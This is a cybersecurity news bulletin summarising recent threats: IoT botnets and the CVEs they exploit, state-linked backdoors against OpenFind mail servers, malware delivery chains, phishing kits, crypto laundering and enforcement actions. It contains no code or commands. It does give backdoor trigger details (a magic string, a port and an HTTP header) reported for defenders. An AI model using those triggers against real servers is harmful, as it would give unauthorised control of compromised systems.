ThreatsDay Bulletin: AI Malware, Voice Bot Flaws, Crypto Laundering, IoT Attacks — and 20 More Stories

The threat actors behind the Mirai-based ShadowV2 botnet have been observed infecting IoT devices across industries and continents. The campaign is said to have been active only during the Amazon Web Services (AWS) outage in late October 2025. It’s assessed that the activity was “likely a test run conducted in preparation for future attacks,” per Fortinet. The botnet exploited several flaws, including CVE-2009-2765 (DDWRT), CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915 (D-Link), CVE-2023-52163 (DigiEver), CVE-2024-3721 (TBK), and CVE-2024-53375 (TP-Link), to recruit susceptible gear into a zombie army of IoT devices. A successful exploitation is followed by the execution of a downloader shell script that delivers the ShadowV2 malware for subsequent DDoS attacks. “IoT devices remain a weak link in the broader cybersecurity landscape,” the company said. “The evolution of ShadowV2 suggests a strategic shift in the targeting behavior of threat actors toward IoT environments.” It’s not just ShadowV2. Another DDoS botnet named RondoDox, also based on Mirai, has weaponized over a dozen exploits to target IoT devices. “Attackers are not only motivated to target vulnerable IoT devices, but also how, if successful, they will take over previously infected devices to add them to their own botnets,” F5 said.

Singapore has ordered Apple and Google to block or filter messages on iMessage and RCS-supported Messages app for Android that masquerade as government agencies, requiring the company to implement new anti-spoofing protections starting December 2025 as part of efforts to curb rising online scams. According to Straits Times, Apple has been issued a directive under the Online Criminal Harms Act, requiring the tech giant to prevent iMessage accounts and group chats from using names that mimic Singapore government agencies or the “gov.sg” sender ID.

The developers behind the Tor project are preparing a major upgrade called Counter Galois Onion (CGO), which replaces the long-standing relay encryption method used across the anonymity network. “It’s based on a kind of construction called a Rugged Pseudorandom Permutation (RPRP): essentially, it’s a design for a wide-block cipher that resists malleability in one direction (for the encrypt operation, but not the decrypt operation),” the Tor Project said. “If we deploy this so that clients always decrypt and relays always encrypt, then we have a tagging-resistant cipher at less cost than a full SPRP [strong pseudorandom permutation]!” The updates aim to raise the cost of active attacks along a circuit, such as tagging and traffic-interception attacks, as well as prevent bad actors from tampering with encrypted traffic, add forward secrecy, and make the network more resilient.

Kaspersky said it identified nearly 6.4 million phishing attacks, which targeted users of online stores, payment systems, and banks in the first ten months of 2025. “As many as 48.2% of these attacks were directed at online shoppers,” it said, adding it “detected more than 2 million phishing attacks related to online gaming” and “blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.”

ESET has disclosed details of a new toolset dubbed QuietEnvelope that’s specifically developed to target the MailGates email protection system of OpenFind email servers. The toolset comprises Perl scripts and three stealthy backdoors, among other miscellaneous files. “The Perl scripts are mainly responsible for deploying three passive backdoors as a loadable kernel module (LKM), an Apache module, and an injected shellcode,” ESET said. “Together, they enable the attackers to have remote access to a compromised server.” The LKM component (“smtp_backdoor”) monitors ingress TCP traffic on port 6400 and triggers when packets contain the magic string EXEC_OPENFIND to execute the command. “The Apache module expects the command, which is executed via popen, in the custom HTTP header OpenfindMaster,” it added. “The third backdoor is injected into a running mgsmtpd process. It is capable of retrieving file content and executing commands. By default, it responds with 250 OK, suggesting that the backdoor is hooked into the code that is maybe responsible for generating the SMTP response.” The tool is believed to be the work of an unknown state-sponsored threat actor, given the sophistication and its ability to blend in. ESET said it found debug strings written in simplified Chinese, which is mainly used in Mainland China.

A Bing search for “belay” leads to the website “belaysolutions[.]com,” which is said to have been compromised with malicious JavaScript that performs a silent redirect to “belaysolutions[.]link” that hosts a double-extension RAR payload disguised as a PDF. Opening the initial payload exploits MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe, ultimately leading to the deployment of a loader executable that’s capable of installing backdoors or stealers. “When run, mmc.exe resolves MUI paths that load the malicious snap-in instead of the legitimate one, triggering embedded TaskPad commands with an encoded PowerShell payload,” Zscaler said. “Decoded via -EncodedCommand, this script downloads UnRAR[.]exe and a password-protected RAR, extracts the next stage, waits briefly, then Invoke-Expression on the extracted script.” The second script displays a decoy PDF and downloads and executes the loader binary. The exact nature of the payload is unclear due to the fact that the command-and-control (C2) infrastructure is unresponsive. The attack chain has been attributed to a Russia-aligned APT group known as Water Gamayun (aka EncryptHub).

The U.K. has exposed two companies, Smart and TGR, which laundered money from cybercrime, drugs trade, firearms smuggling, and immigration crime for a fee, to create “clean” cryptocurrency that the Russian state could then use to evade international sanctions. The National Crime Agency (NCA) said the two entities acquired a bank in Kyrgyzstan to pose as legitimate operations. The network is known to operate in at least 28 U.K. cities and towns. “Smart and TGR collaborated to launder money for transnational crime groups involved in cybercrime, drugs, and firearms smuggling,” the NCA said. “They also helped their Russian clients to illegally bypass financial restrictions to invest money in the U.K., threatening the integrity of our economy.”

Microsoft said it has updated Defender for Office 365 to help security teams remove calendar entries automatically created by Outlook during email delivery. While remediation actions such as Move to Junk, Delete, Soft Delete, and Hard Delete can be used to eliminate email threats from users’ inboxes, the actions did not touch the calendar entry created by the original invite. “With this update, we’re taking the first step toward closing that gap,” the company said. “Hard Delete will now also remove the associated calendar entry for any meeting invite email. This ensures threats are fully eradicated—not just from the inbox but also from the calendar—reducing the risk of user interaction with malicious content.”

Data regulators in Thailand have ordered TIDC Worldverse, which presents the Sam Altman-founded startup, Tools for Humanity, in the country, to stop the collection of iris biometrics in exchange for World (formerly Worldcoin) cryptocurrency payments. It has also demanded the deletion of biometric data already collected from 1.2 million Thai citizens. The project has witnessed similar bans in Brazil, the Philippines, Indonesia, and Kenya.

Timur Kilin, a 21-year-old tech entrepreneur and cybersecurity specialist, was arrested in Moscow on treason charges late last week. While the details of the case are unknown, it’s suspected that Kilin may have attracted the attention of authorities after criticizing the state-backed messaging app Max and the government’s anti-cybercrime legislation.

Threat actors associated with the Smishing Triad have expanded their focus to target Egypt by setting up malicious domains impersonating major Egyptian service providers, including Fawry, the Egypt Post, and Careem. The Smishing Triad is a Chinese-speaking cybercriminal group specializing in large-scale smishing campaigns across the world using a phishing kit named Panda. “Beyond U.S. service impersonation, the smishing kit offers a wide range of international templates, including those that mimic prominent ISPs such as Du (U.A.E.),” Dark Atlas said. “These templates are designed to harvest PII from victims across different regions, significantly expanding the campaign’s global reach.” Recently, Google filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against a massive Phishing-as-a-Service (PhaaS) platform called Lighthouse that has ensnared over 1 million users across 120 countries. Lighthouse is one of the PhaaS services used by the Smishing Triad. The PhaaS kits are primarily distributed through Telegram by a threat actor named Wang Duo Yu (@wangduoyu8).

Mozilla has announced plans to shut down Monitor Plus, a service that allowed user data to be removed from data broker portals. The service will wind down on December 17, 2025. It was offered through a partnership with Onerep, a controversial company whose Belarusian CEO, Dimitiri Shelest, was caught running dozens of people search engine services since 2010. “Mozilla Monitor’s free monitoring service will continue to provide real-time alerts and step-by-step guides to mitigate the risks of a data breach,” Mozilla said.

A new threat actor named NetMedved is targeting Russian companies with phishing emails containing ZIP archives that include a LNK file masquerading as a purchase request, along with other decoy documents. Opening the LNK file triggers a multi-stage infection sequence that drops NetSupport RAT. The activity, per Positive Technologies, was observed in mid-October 2025. The development comes as F6 detailed new attacks mounted by VasyGrek (aka Fluffy Wolf), a Russian-speaking e-crime actor known for striking Russian companies since 2016 to deliver remote access trojans (RATs) and stealer malware. The latest set of attacks recorded between August and November 2025 involved the use of the Pay2Key ransomware, as well as malware developed by PureCoder, including PureCrypter, PureHVNC, and PureLogs Stealer.

Threat actors are using legitimate websites compromised with malicious JavaScript injects to serve site visitors fake CAPTCHA checks that contain a Base64-encoded payload to display a ClickFix lure that’s appropriate for the operating system by using the EtherHiding technique. This involves hiding intermediate JavaScript payloads on the blockchain and using four smart contracts deployed on the Binance Smart Chain (BSC) to ensure that the victim is not a bot and direct them to an operating system (OS)-specific contract. However, the OS-specific JavaScript is delivered only after a call to a gate contract that responds either “yes” or another value. “This gate provides the attacker with a remotely controlled feature flag,” Censys said. “By altering on-chain state, the operator can selectively enable or disable delivery for specific victims, throttle execution, or temporarily disable the entire campaign.” The payloads distributed throughout chains include common stealers like AMOS and Vidar. Similar drive-by compromise attacks have also been found to display counterfeit CAPTCHA verifications that leverage the ClickFix tactic to drop Lumma Stealer, according to NCC Group.

Microsoft said the PhaaS toolkit known as Tycoon 2FA (aka Storm-1747) has emerged as the most prolific platform observed by the company this year. In October 2025 alone, Microsoft Defender for Office 365 blocked more than 13 million malicious emails linked to Tycoon 2FA. “More than 44% of all CAPTCHA-gated phishing attacks blocked by Microsoft were attributed to Tycoon 2FA,” it said. “Tycoon2FA was also directly linked to nearly 25% of all QR code phishing attacks detected in October.” First discovered in 2023, Tycoon 2FA has evolved into a potent tool that leverages real-time Adversary-in-the-Middle (AitM) techniques to capture credentials, steal session tokens, and one-time codes. “The platform delivers high-fidelity phishing pages for Microsoft 365, Gmail, and Outlook, and has become a preferred tool among threat actors due to its subscription-based, low-barrier operational model,” CYFIRMA said.

A new version of Xillen Stealer has introduced advanced features to evade AI-based detection systems by mimicking legitimate users and adjusting CPU and memory usage to imitate normal apps. Its main goal is to steal credentials, cryptocurrency, and sensitive data across browsers, password managers, and cloud environments. It’s marketed on Telegram for anywhere between $99 to $599 per month. The latest iteration also includes code to use AI to detect high-value targets based on weighted indicators and relevant keywords defined in a dictionary. These include cryptocurrency wallets, banking data, premium accounts, developer accounts, and business emails, along with location indicators that include high-value countries such as the U.S., the U.K., Germany, and Japan, and other cryptocurrency-friendly countries and financial hubs. While the feature is not fully implemented by its authors, Xillen Killers, the development shows how threat actors could be leveraging AI in future campaigns, Darktrace said.

The Federal Communications Commission (FCC) has scrapped a set of telecom cybersecurity rules introduced after the Salt Typhoon espionage campaign came to light last year to prevent state-sponsored hackers from breaching American carriers. The ruling came into effect in January 2025. The course reversal comes after what the FCC said were “extensive, urgent, and coordinated efforts” from carriers to mitigate operational risks and better protect consumers. The action follows “months-long engagement with communications service providers where they have demonstrated a strengthened cybersecurity posture following Salt Typhoon,” the agency added, adding it has “taken a series of actions to harden communications networks and improve their security posture to enhance the agency’s investigative process into communications networks outages that result from cyber incidents.” This included establishing a Council on National Security and adopting rules to address cybersecurity risks to critical communications infrastructure without “imposing inflexible and ambiguous requirements.” However, the FCC’s announcement offers no details on how those improvements will be monitored or enforced.

Two British teenagers who were charged with Computer Misuse Act offenses over a cyber attack on Transport for London (TfL) last year pleaded not guilty during a court appearance last week. Thalha Jubair, 19, and Owen Flowers, 18, were arrested at their homes in East London and Walsall, respectively, by officers from the National Crime Agency (NCA) in September 2025.

A security vulnerability has been disclosed in the Retell AI API, which creates AI voice agents that have excessive permissions and functionality. This stems from a lack of sufficient guardrails that causes its large language model (LLM) to deliver unintended outputs. An attacker could exploit this behavior to stage large-scale social engineering, phishing, and misinformation campaigns. “The vulnerability targets Retell AI’s ease of deployment and customizability to perform scalable phishing/social engineering attacks,” the CERT Coordination Center (CERT/CC) said. “Attackers can feed publicly available resources as well as some instructions to Retell AI’s API to generate high-volume and automated fake calls. These fake calls could lead to unauthorized actions, security breaches, data leaks, and other forms of manipulation.” The issue remains unpatched.

A new analysis from Kaspersky has revealed that the dark web continues to serve as a parallel labor market with its own rules, recruitment practices, and salary expectations, while also being influenced by current economic forces. “The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work,” the company said. “At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers, and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.”

AhnLab said it discovered an Android APK malware (“com.golfpang.golfpanggolfpang”) impersonating a famous Korean delivery service, while taking steps to evade security controls using obfuscation and packing techniques. The data stolen by the malware is exfiltrated to a breached legitimate site that’s used for C2. “When the app is launched, it requests the permissions required to perform malicious behaviors from the user,” AhnLab said. In a similar development, a malicious program disguised as SteamCleaner is being propagated via websites that advertise cracked software to deliver a Node.js script capable of communicating with a C2 server periodically and executing commands issued by the attacker. While it’s not known what commands are sent via the C2 channel, AhnLab said the activity could lead to the installation of proxyware and other payloads. The counterfeit installers are hosted on GitHub repositories managed by the threat actor.

Director-General of Security Mike Burgess, the head of Australia’s Security Intelligence Organisation (ASIO), disclosed that threat actors operating on behalf of China’s government and military probed the country’s telecoms network and key infrastructure. Burgess warned that authoritarian regimes “are growing more willing to disrupt or destroy critical infrastructure” using cyber sabotage. Espionage is estimated to have cost the country A$12.5 billion ($8.1 billion) in 2024. However, China has dismissed the remarks, stating they “spread false narratives and deliberately provoked confrontation.”

Alice Guo, a 35-year-old Chinese woman who posed as a local and was elected as mayor for the city of Bamban in 2022, was sentenced to life in prison after she was found guilty of human trafficking for her role in running a huge cyber scam compound that was operating under online casinos, known locally as Philippine Offshore Gaming Operations (Pogo). Guo, along with three others, was sentenced to life in prison and a fine of 2 million pesos ($33,832).

Multiple vulnerabilities in Microsoft Windows have been exploited by threat actors to leak NTLM hashes and augment their post-exploitation efforts. These include CVE-2024-43451, which has been abused by BlindEagle and Head Mare, CVE-2025-24054, which has been abused in phishing attacks targeting Russia to deliver Warzone RAT, and CVE-2025-33073, which has been abused in “suspicious activity” against an unnamed target belonging to the financial sector in Uzbekistan. In this attack, the threat actor exploited the flaw to check if they had sufficient privileges to execute code using batch files that ran reconnaissance commands, establish persistence, dump LSASS memory, and unsuccessfully attempt to move laterally to the administrative share of another host. No further activity was detected. “While Microsoft has announced plans to phase it out, the protocol’s pervasive presence across legacy systems and enterprise networks keeps it relevant and vulnerable,” Kaspersky said. “Threat actors are actively leveraging newly disclosed flaws to refine credential relay attacks, escalate privileges, and move laterally within networks, underscoring that NTLM still represents a major security liability.”